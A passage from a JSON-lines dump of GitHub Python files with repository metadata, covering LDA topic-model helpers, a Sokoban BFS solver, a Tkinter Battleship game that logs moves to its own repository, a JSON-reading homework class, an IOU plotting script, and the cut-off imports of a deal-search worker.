mallet_model.wordtopics\n model_gensim.sync_state()\n return model_gensim\n\n\n# creates a dataframe with the word-topics\ndef term_doc_df(lda, nr_words=20):\n # top 20 significant terms and their probabilities for each topic :\n topics = [[(term, round(wt, 3)) for term, wt in lda.show_topic(n, topn=nr_words)] for n in\n range(0, lda.num_topics)]\n\n # dataframe for term-topic matrix:\n topics_df = pd.DataFrame([[term for term, wt in topic] for topic in topics],\n columns=['Term ' + str(i) for i in range(1, 21)],\n index=['Topic ' + str(t) for t in range(1, lda.num_topics + 1)]).T\n return topics_df\n\n\n# DOMINANT TOPIC FOR EACH DOCUMENT\ndef main_topic_doc_df(LdaMallet, corpus, df):\n # distribution of topics per each document\n tm_distribution = LdaMallet[corpus]\n # Dominant topic per each document\n sorted_topic_distr = [sorted(topics, key=lambda record: -record[1])[0] for topics in tm_distribution]\n\n # create an empty dataframe\n topics_docs_df = pd.DataFrame()\n # get the screen_names from the original dataframe\n topics_docs_df['screen_name'] = df.screen_name\n topics_docs_df['main_topic'] = [item[0] + 1 for item in sorted_topic_distr]\n topics_docs_df['%_contribution'] = [round(item[1] * 100, 2) for item in sorted_topic_distr]\n # corpus_topic_df['Topic_term'] = [topics_df.iloc[t[0]]['term_per_topic'] for t in corpus_topics]\n return topics_docs_df\n\n\n# from a list of lemmatized tokens, returns dictionary and corpus to use with lda model\ndef dict_corpus(lemmas, excluded_words):\n # exclude some locations from the words/bigrams\n lemmas = [[word for word in sent if word not in excluded_words] for sent in lemmas]\n\n # create dictionary\n id2word = corpora.Dictionary(lemmas)\n\n # Filter out words that occur less than 10 documents, or more than 50% of the documents.\n # no_below : Keep tokens which are contained in at least `no_below` documents. no_above : Keep tokens which are\n # contained in no more than `no_above` documents (fraction of total corpus size, not an absolute number). keep_n :\n # Keep only the first `keep_n` most frequent tokens.\n id2word.filter_extremes(no_below=10, no_above=0.5)\n corpus = [id2word.doc2bow(doc) for doc in lemmas]\n return id2word, corpus\n\n\n# GROUP BY TOPICS - from a dataframe with distribution of topics, returns the sum of main topic occurrence per each\n# document\ndef freq_topic_df(corpus_topic_df, corpus):\n freq_topic_df = corpus_topic_df.groupby('topic_name').agg(\n total_docs=('topic_name', np.size),\n docs_perc=('topic_name', np.size)).reset_index()\n\n freq_topic_df['docs_perc'] = freq_topic_df['docs_perc'].apply(\n lambda row: round((row * 100) / len(corpus), 2))\n return freq_topic_df\n", "repo_name": "annalisamf/msc-computer-science-project", "sub_path": "topic_model/tm_utils.py", "file_name": "tm_utils.py", "file_ext": "py", "file_size_in_byte": 7649, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "spacy.load", "line_number": 13, "usage_type": "call"}, {"api_name": "spacy.load", "line_number": 14, "usage_type": "call"}, {"api_name": "gensim.models.phrases.Phraser", "line_number": 65, "usage_type": "call"}, {"api_name": "gensim.models.Phrases", "line_number": 65, "usage_type": "call"}, {"api_name": "gensim.models.wrappers.LdaMallet", "line_number": 75, "usage_type": "call"}, {"api_name": "gensim.models.CoherenceModel", "line_number": 76, "usage_type": "call"}, {"api_name": "gensim.models.CoherenceModel", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 86, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 87, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 88, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 88, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 89, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 90, "usage_type": "name"}, {"api_name": "gensim.models.LdaModel", "line_number": 95, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 110, "usage_type": "call"}, {"api_name": "gensim.models.wrappers.LdaMallet", "line_number": 119, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 124, "usage_type": "call"}, {"api_name": "gensim.corpora.Dictionary", "line_number": 139, "usage_type": "call"}, {"api_name": "gensim.corpora", "line_number": 139, "usage_type": "name"}, {"api_name": "numpy.size", "line_number": 154, "usage_type": "attribute"}, {"api_name": "numpy.size", "line_number": 155, "usage_type": "attribute"}]} +{"seq_id": "41815233891", "text": "from collections import deque\nclass State:\n def __init__(self, player, boxes, board, boxes_left):\n self.player = player\n self.boxes = boxes\n self.board = board\n self.boxes_left = boxes_left\n self.height = len(board)\n self.width = len(board[0])\n # self.print_state()\n def print_board(self):\n for row in self.board:\n for col in row:\n print(col, end = \"\")\n print(\"\")\n def print_state(self):\n print(\"Player: {}\".format(self.player))\n print(\"Boxes: {}\".format(self.boxes))\n print(\"Boxes left: {}\".format(self.boxes_left))\n self.print_board()\n def get_repr(self):\n return (self.player, tuple(self.boxes))\n\n def __hash__(self):\n return hash(self.get_repr())\n\n def __eq__(self, other):\n if isinstance(other, State):\n return self.get_repr() == other.get_repr()\n return False\n\n def is_solved(self):\n return self.boxes_left == 0\n\n def is_push_valid(self, pos, dir):\n new_pos = add_pos(pos, dir)\n if new_pos[0] < 0 or new_pos[1] < 0 or new_pos[0] >= self.height or new_pos[1] >= self.width:\n return False\n if new_pos in self.boxes:\n return False\n return self.board[new_pos[0]][new_pos[1]] != 'W'\n\n def is_move_valid(self, dir):\n new_pos = add_pos(self.player, dir)\n if new_pos[0] < 0 or new_pos[1] < 0 or new_pos[0] >= self.height or new_pos[1] >= self.width:\n return False\n if new_pos in self.boxes:\n return self.is_push_valid(new_pos, dir)\n return self.board[new_pos[0]][new_pos[1]] != 'W'\n\n def generate_state(self, dir):\n # print(\"self.player: {}\".format(self.player))\n # print(\"dir: {}\".format(dir))\n new_pos = add_pos(self.player, dir)\n # print(\"new_pos: {}\".format(new_pos))\n if new_pos in self.boxes:\n # print(\"pushed\")\n boxes = self.boxes[:]\n box_pos = add_pos(new_pos, dir)\n boxes[boxes.index(new_pos)] = box_pos\n boxes_left = self.boxes_left - int(self.board[box_pos[0]][box_pos[1]] == 'G') + int(self.board[new_pos[0]][new_pos[1]] == 'G')\n return State(new_pos, boxes, self.board, boxes_left)\n return State(new_pos, self.boxes, self.board, self.boxes_left)\n\n def get_neighbours(self):\n neighbors = []\n for dir in [(-1, 0), (1, 0), (0, 1), (0, -1)]:\n # print(dir)\n if self.is_move_valid(dir):\n new_state = self.generate_state(dir)\n neighbors.append(new_state)\n # else:\n # print(\"Player: {} Boxes: {} Dir: {}\".format(self.player, self.boxes, dir))\n return neighbors\n\ndirections_dict = {( 1, 0) : \"D\",\n (-1, 0) : \"U\",\n ( 0, 1) : \"R\",\n ( 0, -1) : \"L\"}\n\ndef add_pos(pos1, pos2):\n return (pos1[0] + pos2[0], pos1[1] + pos2[1])\n\ndef diff_pos(pos1, pos2):\n return (pos1[0] - pos2[0], pos1[1] - pos2[1])\n\ndef construct_path(prev_state_map, cur_state):\n path = []\n while cur_state is not None:\n temp = cur_state\n cur_state = prev_state_map[cur_state]\n if cur_state is not None:\n path.append(directions_dict[diff_pos(temp.player, cur_state.player)])\n return list(reversed(path))\n\ndef get_step_path(initial_state):\n states_queue = deque([initial_state])\n prev_state_map = {initial_state: None}\n while len(states_queue) > 0:\n cur_state = states_queue.popleft()\n # cur_state.print_state()\n if cur_state.is_solved():\n return construct_path(prev_state_map, cur_state)\n neighbors = cur_state.get_neighbours()\n for neighbor in neighbors:\n # neighbor.print_state()\n if neighbor not in prev_state_map:\n # print(\"added state\")\n prev_state_map[neighbor] = cur_state\n states_queue.append(neighbor)\n # print(\"checkpoint 1\")\n return []\n\ndef print_solution(step_path, ofile):\n for step in step_path:\n ofile.write(step)\n ofile.write(\"\\n\")\n\ndef main():\n with open(\"zad_input.txt\") as ifile:\n with open(\"zad_output.txt\", \"w\") as ofile:\n board = [list(line[:-1]) for line in ifile]\n player = (0,0)\n boxes = []\n boxes_left = 0\n for i in range(len(board)):\n for j in range(len(board[i])):\n if board[i][j] == \"K\":\n board[i][j] = \".\"\n player = (i, j)\n elif board[i][j] == \"+\":\n board[i][j] = \"G\"\n player = (i, j)\n elif board[i][j] == \"B\":\n board[i][j] = \".\"\n boxes_left += 1\n boxes.append((i, j))\n elif board[i][j] == \"*\":\n board[i][j] = \"G\"\n boxes.append((i, j))\n initial_state = State(player, boxes, board, boxes_left)\n step_path = get_step_path(initial_state)\n # print(step_path)\n print_solution(step_path, ofile)\n\nif __name__ == '__main__':\n main()\n", "repo_name": "Nerd911/University", "sub_path": "Sztuczna_Inteligencja/Lista2/zad2.py", "file_name": "zad2.py", "file_ext": "py", "file_size_in_byte": 5281, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "collections.deque", "line_number": 97, "usage_type": "call"}]} +{"seq_id": "322274354", "text": "import random\nimport os\nimport time\nfrom tkinter import *\nfrom tkinter import font\nfrom tkinter import messagebox\nfrom functools import partial\nfrom util_for_saving_data import *\n\nTOKEN = os.environ['GITHUB_TOKEN']\nfile_path = \"Jinav22/Battleship_RIDS\"\nfile_name = \"data.txt\"\n\nframes = []\nBOARD_SIZE = 8\n\ndata1 = ''\ndata2 = ''\nhuman_ship_pos = []\nbot_ship_pos = []\nmoves_h = []\nmoves_b = []\nhits = []\nstrategy = False\n\nclass Ship:\n def __init__(self, name, size):\n self.name = name\n self.size = size\n self.position = {}\n self.sunk = False\n\n\nclass Player:\n def __init__(self, parent, name, auto=False, text=''):\n self.parent = parent\n self.name = name\n self.text = text\n self.auto = auto\n self.label = None\n self.status = None\n # self.wins = 0\n # self.losses = 0\n # self.ties = 0\n self.reset()\n\n def reset(self):\n global frames\n self.initShips()\n self.sunk = 0\n self.board = [[' ' for _ in range(BOARD_SIZE)] for _ in range(BOARD_SIZE)]\n self.valid = []\n for i in range(BOARD_SIZE):\n for j in range(BOARD_SIZE):\n self.valid += [[i, j]]\n self.turn = 0\n if len(frames) > 2:\n frames[-2].grid_forget()\n frames[-1].grid_forget()\n self.boardReset()\n\n # self.initShipPositions()\n\n def initShips(self):\n self.ships = []\n self.ships += [Ship(\"Carrier\", 5)]\n self.ships += [Ship(\"Battleship\", 4)]\n self.ships += [Ship(\"Submarine\", 3)]\n self.ships += [Ship(\"Cruiser\", 3)]\n self.ships += [Ship(\"Destroyer\", 2)]\n #\n # def win(self):\n # self.wins += 1\n #\n # def loss(self):\n # self.losses += 1\n #\n # def tie(self):\n # self.ties += 1\n #\n # def stats(self):\n # return [self.wins, self.ties, self.losses]\n\n # Randomly place the ships on the board. Searches for a valid location.\n # A valid location is a location where the ship fits completely on the board.\n # Also the ship must be in a location that is not already occupied by another ship\n def initShipPositions(self):\n for currentShip, ship in enumerate(self.ships):\n found = False\n while not found:\n ship.position = {}\n i = random.randint(0, len(self.valid) - 1)\n t = self.valid[i]\n x = t[0]\n y = t[1]\n # Try to place the ship horizontally or vertically\n # Trying horizontal or vertical placement first is random\n j = random.randint(0, 1)\n for k in range(2):\n count = 1\n x1 = x\n y1 = y\n ship.position = {}\n found = True\n for i in range(ship.size):\n if j % 2 == 0:\n x1 = x + i\n else:\n y1 = y + i\n if [x1, y1] not in self.valid:\n found = False\n break\n # Check to see if a ship already exists in this position\n for foundShips in range(currentShip):\n if (x1, y1) in self.ships[foundShips].position:\n found = False\n break\n if not found:\n break\n ship.position[(x1, y1)] = 1\n if found:\n break\n j += 1\n # print(f\"{ship.name} is in {ship.position}\")\n bot_ship_pos.append(list(ship.position.keys()))\n self.printBoard()\n\n def printBoard(self):\n for i in range(BOARD_SIZE):\n #print(self.board[i])\n pass\n\n # Check our list of valid remaining moves to see if the move is valid\n def checkMove(self, x, y):\n if [x, y] in self.valid:\n return True\n return False\n\n # Resets the GUI board for the player\n def boardReset(self):\n for x in range(BOARD_SIZE):\n for y in range(BOARD_SIZE):\n self.buttons[x][y].configure(image=game.blank, compound=\"left\")\n self.status.configure(text=\"Setup\", fg=\"blue\", bg=\"white\")\n\n # Creates the GUI board for the player\n def boardInit(self):\n self.buttons = []\n for x in range(BOARD_SIZE):\n self.buttons += [[]]\n for y in range(BOARD_SIZE):\n if self.auto:\n self.buttons[x] += [Button(frames[-1], text=\"\", image=game.blank, borderwidth=1,\n command=partial(self.parent.tkplaceships, x, y, root))]\n else:\n self.buttons[x] += [Button(frames[-1], text=\"\", image=game.blank, borderwidth=1,\n command=partial(self.parent.tkmove, x, y, root))]\n self.buttons[x][y].grid(row=x, column=y)\n\n # Prompts user in the GUI. Returns True if the user wants to play again, otherwise False\n def playAgain(self):\n return messagebox.askyesno(\"Game Over\",\n f\"{self.name} wins! All ships were sunk in {self.turn} turns. Would you like to play again?\")\n\n\n # Display appropriate messages\n # If all ships were sunk, ask if the player wants to play again\n # Reset the game if the player wants to play again\n # Take action to end the game if the player does not want to play again\n # If ships still remain, inform the player that the ship was sunk.\n def shipWasSunkMessages(self, ship):\n global data1\n global data2\n\n #print(f\"{ship.name} was sunk!!\")\n if self.sunk == 5:\n repository = github_setup(TOKEN, file_path)\n for i in human_ship_pos:\n data1 += ('\\\"' + ','.join([str(j) for j in i]) + '\\\"' + ',')\n\n data1 += ('\\\"' + ','.join([str(i) for i in moves_h]) + '\\\"' + ',')\n data1 += 'Human'\n\n #print(data1)\n update_data, commit_message = update_github_file(repository, file_name, data1)\n #push(repository, file_name, commit_message, update_data)\n\n repository = github_setup(TOKEN, file_path)\n for i in bot_ship_pos:\n data2 += '\\\"' + ','.join([str(j) for j in i]) + '\\\"' + ','\n\n data2 += ('\\\"' + ','.join([str(i) for i in moves_b]) + '\\\"' + ',')\n\n data2 += 'Bot'\n\n data, commit_message = update_github_file(repository, file_name, data2)\n #push(repository, file_name, commit_message, data)\n\n print(update_data, data)\n\n if self.playAgain():\n self.parent.reset()\n self.boardReset()\n else:\n self.parent.status = 'Over'\n root.destroy()\n else:\n self.status.configure(text=f\"{ship.name} was sunk!\", bg=\"white\", fg=\"red\")\n self.status2.configure(text=f\"Ships intact: {5-self.sunk}\", fg=\"blue\", bg=\"white\")\n return True\n\n # Returns False if the ship was already sunk or if unhit sections of the ship remain\n # Returns True if the ship was sunk\n def isSunk(self, ship):\n if ship.sunk:\n return False\n for k in ship.position.keys():\n if list(k) in self.valid:\n return False\n ship.sunk = True\n self.sunk += 1\n return True\n\n def move(self, x, y, s, p):\n global strategy\n\n self.board[x][y] = s\n self.valid.pop(self.valid.index([x, y]))\n self.turn += 1\n foundHit = False\n for ship in self.ships:\n if ship.sunk == False and (x, y) in ship.position:\n self.buttons[x][y].configure(image=self.parent.hit, compound=\"left\")\n self.status.configure(text=f\"{ship.name} was hit!\", bg=\"white\", fg=\"red\")\n foundHit = True\n SUNK = self.isSunk(ship)\n if p == \"bot\":\n hits.append([x, y])\n strategy = True\n strategy = (strategy and not SUNK)\n #print(ship, self.isSunk(ship))\n if SUNK:\n self.shipWasSunkMessages(ship)\n if foundHit and p == \"bot\":\n moves_b.append([x, y, ship.name])\n if foundHit and p == \"human\":\n moves_h.append([x, y, ship.name])\n break\n\n if not foundHit:\n if p == \"bot\":\n moves_b.append([x, y, '-'])\n if p == \"human\":\n moves_h.append([x, y, '-'])\n\n self.buttons[x][y].configure(image=self.parent.miss, compound=\"left\")\n self.status.configure(text=f\"Miss.\", bg=\"white\", fg=\"blue\")\n # print(self.board)\n\n # The computer's moves are random right now. Some intelligence in the future would be nice.\n def autoMove(self):\n x = self.valid[random.randint(0, len(self.valid) - 1)]\n #moves_b.append(x)\n return x\n\n def strategic_move(self):\n # if hits[-1][0] == 0 and hits[-1][1] != 0:\n # opt = [\"x\", \"y\", \"-y\"]\n # elif hits[-1][1] == 0 and hits[-1][0] != 0:\n # opt = [\"-x\", \"x\", \"y\"]\n # elif hits[-1][1] == 0 and hits[-1][0] == 0:\n # opt = [\"x\", \"y\"]\n # elif hits[-1][1] == (BOARD_SIZE - 1) and hits[-1][0] == (BOARD_SIZE - 1):\n # opt = [\"-x\", \"-y\"]\n # elif hits[-1][1] == (BOARD_SIZE - 1):\n # opt = [\"-x\", \"-y\", \"x\"]\n # elif hits[-1][0] == (BOARD_SIZE - 1):\n # opt = [\"x\", \"-y\",\"y\"]\n # else:\n # opt = [\"-x\",\"x\",\"y\",\"-y\"]\n # xory = random.choice(opt)\n # if xory == \"-x\":\n # print(xory,moves_b)\n # x = hits[-1][0] -1\n # y = hits[-1][1]\n # if [x, y] not in self.valid:\n # xory = random.choice([\"x\",\"y\",\"-y\"])\n # if xory == \"x\":\n # print(xory,moves_b)\n # x = hits[-1][0] + 1\n # y = hits[-1][1]\n # if [x, y] not in self.valid:\n # xory = random.choice([\"y\",\"-y\"])\n # if xory == \"-y\":\n # print(xory,moves_b)\n # x = hits[-1][0]\n # y = hits[-1][1] - 1\n # if [x, y] not in self.valid:\n # xory = random.choice([\"x\",\"y\",\"-y\"])\n # if xory == \"y\":\n # print(xory,moves_b)\n # x = hits[-1][0]\n # y = hits[-1][1] + 1\n # if [x, y] not in self.valid:\n # y -= 2\n # if [x, y] not in self.valid:\n # y += 1\n # x += 1\n # if [x, y] not in self.valid:\n # x -= 2\n # if [x,y] not in self.valid:\n # x = moves_b[-1][0] + 1\n\n x = hits[-1][0] - 1\n y = hits[-1][1]\n opt = [\"x\",\"-x\",\"y\",\"-y\"]\n valid = [x,y] in self.valid\n tried = []\n d = 1\n a = -1\n while not valid:\n xory = random.choice(opt)\n if xory in tried:\n if len(tried) == len(opt):\n tried = []\n d += 1\n continue\n if xory == \"-x\":\n tried.append(xory)\n # print(xory, moves_b)\n x = hits[-1][0] - d\n y = hits[-1][1]\n valid = [x, y] in self.valid\n continue\n if xory == \"x\":\n tried.append(xory)\n # print(xory, moves_b)\n x = hits[-1][0] + d\n y = hits[-1][1]\n valid = [x, y] in self.valid\n continue\n if xory == \"-y\":\n tried.append(xory)\n # print(xory, moves_b)\n x = hits[-1][0]\n y = hits[-1][1] - d\n valid = [x, y] in self.valid\n continue\n if xory == \"y\":\n tried.append(xory)\n # print(xory, moves_b)\n x = hits[-1][0]\n y = hits[-1][1] + d\n valid = [x, y] in self.valid\n continue\n #moves_b.append([x, y])\n return x, y\n\n\n # Returns True if we've placed the last ship, otherwise False\n def donePlacingShips(self, holdi):\n for x1, y1 in self.ships[holdi].position.keys():\n self.buttons[x1][y1].configure(image=self.parent.ship1, compound=\"left\")\n if holdi == len(self.ships) - 1:\n return True\n return False\n\n # Returns False if the x,y position is already taken by another ship\n # Otherwise, the position is open, so True is returned\n def positionEmpty(self, x, y):\n for ship in self.ships:\n if (x, y) in ship.position:\n return False\n return True\n\n # Allows the player to place ships on their board wherever they choose\n # Uses the board GUI in order to place the ships\n # Will only allow legal placement of the ships\n def placeShips(self, x, y):\n found = False\n holdi = -1\n for i, ship in enumerate(self.ships):\n self.status.configure(text=f\"{ship.name} {ship.size} tiles\", bg=\"white\", fg=\"blue\")\n if len(ship.position) < ship.size:\n if len(ship.position) == 0:\n found = True\n elif len(ship.position) == 1:\n x1, y1 = list(ship.position.keys())[0]\n if (x == x1 and (y == y1 + 1 or y == y1 - 1)) or \\\n (y == y1 and (x == x1 + 1 or x == x1 - 1)):\n found = True\n else:\n a = sorted(ship.position.keys())\n xdif = a[1][0] - a[0][0]\n ydif = a[1][1] - a[0][1]\n if (x + xdif == a[0][0] and y + ydif == a[0][1]) or \\\n (x - xdif == a[-1][0] and y - ydif == a[-1][1]):\n found = True\n holdi = i\n break\n if found and self.positionEmpty(x, y):\n self.ships[holdi].position[(x, y)] = 1\n self.buttons[x][y].configure(image=self.parent.ship, compound=\"left\")\n else:\n for x1, y1 in self.ships[holdi].position.keys():\n self.buttons[x1][y1].configure(image=self.parent.blank, compound=\"left\")\n self.ships[holdi].position = {}\n return False\n if self.ships[holdi].size == len(self.ships[holdi].position):\n human_ship_pos.append(list(ship.position.keys()))\n return self.donePlacingShips(holdi)\n return False\n\n\nclass Game:\n def reset(self):\n self.player.reset()\n self.computer.reset()\n self.status = 'Setup'\n\n def __init__(self):\n self.player = Player(self, \"Player\")\n self.computer = Player(self, \"Computer\", True)\n self.hit = PhotoImage(file=\"hit.gif\").subsample(4, 4)\n self.miss = PhotoImage(file=\"miss.gif\").subsample(4, 4)\n self.blank = PhotoImage(file=\"blank.gif\").subsample(4, 4)\n self.ship = PhotoImage(file=\"ship.gif\").subsample(4, 4)\n self.ship1 = PhotoImage(file=\"ship1.gif\").subsample(4, 4)\n self.reset()\n\n # A move was made from our GUI\n def tkmove(self, x, y, root):\n global strategy\n # print(self.turn, self.player.text, x, y)\n if self.player.checkMove(x, y):\n self.player.move(x, y, 'X',\"human\")\n if self.status == 'GamePlay':\n if self.computer.auto:\n if strategy:\n x, y = self.computer.strategic_move()\n else:\n x, y = self.computer.autoMove()\n # if self.player.sunk < 5:\n self.computer.move(x, y, 'X', \"bot\")\n\n # Called when clicking on the player's board. This is used to place the player's ships on their board.\n def tkplaceships(self, x, y, root):\n if self.status == 'Setup':\n if self.computer.placeShips(x, y):\n completeBoard(self, root)\n self.status = 'GamePlay'\n # print(self.computer.ships[0].position)\n\n\ndef startBoard(game, root):\n global frames\n frames += [Frame(root, bg=\"blue\", height=70, width=232)]\n frames[-1].pack_propagate(False)\n game.player.label = Label(frames[-1], text=f\"{game.player.name}'s Board\", fg=\"white\", bg=\"blue\",\n font=\"Verdana 12 bold\", anchor=\"center\", justify=\"center\")\n game.player.label.pack()\n game.computer.status = Label(frames[-1], text=\"Setup\", fg=\"blue\", bg=\"white\", font=\"Verdana 16 bold\",\n anchor=\"center\", justify=\"center\")\n game.computer.status.pack()\n frames[-1].grid(column=0, row=0, sticky=\"n\")\n frames += [Frame(root, bg=\"blue\")]\n frames[-1].pack_propagate(False)\n frames[-1].grid(sticky=\"n\")\n # game.computer.boardInit()\n\n frames += [Frame(root, bg=\"blue\", height=70, width=232)]\n frames[-1].pack_propagate(False)\n game.computer.status2 = Label(frames[-1], text=\"Ships intact: 5\", fg=\"blue\", bg=\"white\", font=\"Verdana 16\",\n anchor=\"center\", justify=\"center\")\n game.computer.status2.pack()\n frames[-1].grid(column=0, row=1, sticky=\"n\")\n frames += [Frame(root, bg=\"blue\")]\n frames[-1].pack_propagate(False)\n frames[-1].grid(sticky=\"n\")\n game.computer.boardInit()\n return\n\n\ndef completeBoard(game, root):\n global frames\n frames += [Frame(root, bg=\"blue\", width=10)]\n frames[-1].grid(column=1, row=0, sticky=\"n\")\n frames[-1] = Frame(root, bg=\"blue\", height=70, width=232)\n frames[-1].pack_propagate(False)\n game.computer.label = Label(frames[-1], text=f\"{game.computer.name}'s Board\", fg=\"white\", bg=\"blue\",\n font=\"Verdana 12 bold\", anchor=\"center\", justify=\"center\")\n game.computer.label.pack()\n game.player.status = Label(frames[-1], text=f\"You go first.\", fg=\"blue\", bg=\"white\", font=\"Verdana 16 bold\",\n anchor=\"center\", justify=\"center\")\n game.player.status.pack()\n frames[-1].grid(column=2, row=0, sticky=\"n\")\n frames += [Frame(root, bg=\"blue\")]\n frames[-1].pack_propagate(False)\n frames[-1].grid(column=2, row=1, sticky=\"n\")\n\n frames += [Frame(root, bg=\"blue\", height=70, width=232)]\n frames[-1].pack_propagate(False)\n game.player.status2 = Label(frames[-1], text=\"Ships intact: 5\", fg=\"blue\", bg=\"white\", font=\"Verdana 16\",\n anchor=\"center\", justify=\"center\")\n game.player.status2.pack()\n frames[-1].grid(column=2, row=1, sticky=\"n\")\n frames += [Frame(root, bg=\"blue\")]\n frames[-1].pack_propagate(False)\n frames[-1].grid(sticky=\"n\")\n\n frames[-1].grid(column=2, row=2, sticky=\"n\")\n game.player.boardInit()\n game.player.initShipPositions()\n return\n\n\nif __name__ == '__main__':\n root = Tk()\n root.title(\"Battleship Game\")\n game = Game()\n startBoard(game, root)\n root.mainloop()\n", "repo_name": "Jinav22/Battleship_RIDS", "sub_path": "battleship.py", "file_name": "battleship.py", "file_ext": "py", "file_size_in_byte": 19321, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.environ", "line_number": 10, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 92, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 98, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 154, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 157, "usage_type": "call"}, {"api_name": "tkinter.messagebox.askyesno", "line_number": 162, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 162, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 262, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 322, "usage_type": "call"}]} +{"seq_id": "15408482924", "text": "import json\n\n\nclass PersonalData:\n def __init__(self, user_file):\n self.user_file = user_file\n self.user_data = self.read_json_file() # user_data - contains the contents of the data_file\n self.name = self.user_data['name']\n self.city = self.user_data['city']\n self.children = self.user_data['children']\n self.has = self.user_data['has']\n\n def read_json_file(self):\n with open(self.user_file, 'r') as data_file:\n return json.load(data_file)\n\n def user_info(self):\n print(f'The users name is {self.name}. '\n f'He has lived in {self.city}. '\n f'He has {len(self.children)} children. Their names are {\", \".join(self.children)}. '\n f'He owns: ', end=\"\")\n for k, v in self.has.items():\n print(\", \".join([f'{k} - {v}']), end=\", \")\n\n\nuser_1 = PersonalData('user1.json')\nprint(user_1.user_info())\nprint('\\n')\nuser_2 = PersonalData('user2.json')\nprint(user_2.user_info())\nprint('\\n')\nuser_3 = PersonalData('user3.json')\nprint(user_3.user_info())\n\n\n", "repo_name": "eugene-okulik/QAP-09onl", "sub_path": "homework/mary_bilaya/homework_25/task_hm_25.py", "file_name": "task_hm_25.py", "file_ext": "py", "file_size_in_byte": 1074, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "61", "api": [{"api_name": "json.load", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "18964200378", "text": "import numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\nsns.set_style(\"darkgrid\")\n\nwith open('output/output.txt', \"r\") as f:\n lines = f.readlines()\n\niou = []\nclasses = []\n\nlines = lines[1:]\n\nfor line in lines:\n if line[0] == '#':\n break\n if line[0] == '\\n':\n continue\n line = line.replace('=', ':').strip().split(':')\n if line[-1][-2:] == 'AP':\n classes.append(line[-1][:-2])\n\n if line[0] == 'IOU ':\n value = line[1]\n if value == ' nan':\n value = 0.0\n else:\n value = float(value)\n iou.append(value)\n\niou = np.array(iou)\nclasses = np.array(classes)\n\narg = np.argsort(iou)\nprint(arg)\niou = iou[arg]\nclasses = classes[arg]\nplt.figure(figsize=(9, 21))\nplt.barh(classes, iou, align='center', color='royalblue')\n\nfor index, value in enumerate(iou):\n plt.text(value, index, '{0:.2f}'.format(value), fontsize=16, color='royalblue')\n\nplt.title('Average IOU: {0:.2f}%'.format(np.mean(iou) * 100), fontsize=18)\nplt.xlabel('IOU', fontsize=18)\nplt.yticks(fontsize=18)\nplt.tight_layout()\nplt.savefig('output/iou.png')\nplt.show()\n", "repo_name": "MahmudulAlam/Object-Detection-Using-GPM", "sub_path": "mAP/iou.py", "file_name": "iou.py", "file_ext": "py", "file_size_in_byte": 1125, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "seaborn.set_style", "line_number": 5, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.barh", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.text", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 43, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}, {"api_name": "numpy.mean", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 46, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 47, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 48, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}]} +{"seq_id": "43536769207", "text": "from pydantic import ValidationError\nimport logging\nfrom models import DealifySearch, DealifyWorkerStatus, CraigslistOverdueSearchTaskConfig, SearchConfig, CraigslistConfig, LocationRestrictionConfig, PriceRestrictionConfig, DealifySearchTaskTypes, DealifySources\nfrom config import WORKER_LOG_FORMAT, DEV_MODE, BASE_LOGGER_NAME, WORKER_LOG_LEVEL, WORKER_LOG_FILE, 